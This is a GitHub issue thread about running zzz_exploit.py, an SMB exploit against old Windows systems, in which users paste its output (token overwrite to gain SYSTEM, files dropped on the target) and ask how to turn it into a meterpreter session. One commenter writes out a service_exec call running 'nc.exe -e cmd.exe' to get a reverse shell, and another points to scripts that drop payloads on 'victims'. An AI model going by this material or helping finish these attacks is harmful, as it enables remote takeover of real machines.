zzz_exploit.py i have this result but...
kalifan opened this issue · 6 comments
the exploit it is working fine, but i dont understant how it work to completed the process and get a meterpreter session.
Target OS: Windows 5.1
Using named pipe: spoolss
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x84927da8
SESSION: 0xe2b8b190
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe3693030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe36930d0
overwriting token UserAndGroups
creating file c:\pwned.txt on the target
Done
Someone can help me thanks.
i try in lan works fine, maybe in wan it does not work fine. maybe it is AV, i dont know.
No support issue
on the same note. I have copied nc.exe into Windows 2003 using python script. Now, I want to invoke nc.exe using service_exec(conn, r'cmd /c c:\nc.exe'). how do I go about that?
I also tried service_exec(conn, r'cmd /c c:\nc.exe c:\nc.exe -e cmd.exe ') still now getting reverse shell.
modify transaction struct for arbitrary read/write make this SMB session to be SYSTEM current TOKEN addr: 0xe1088b18 userAndGroupCount: 0x5 userAndGroupsAddr: 0xe1088bb8 overwriting token UserAndGroups copying shell file c:\nc.exe on the target Donethere are already new scripts for smb exploitation on the web that drop a payload to the victims and execute it , and then return a meterpreter session to you , witch is much more simple .
Those scripts are based on this one here with a few changes , search it on github ,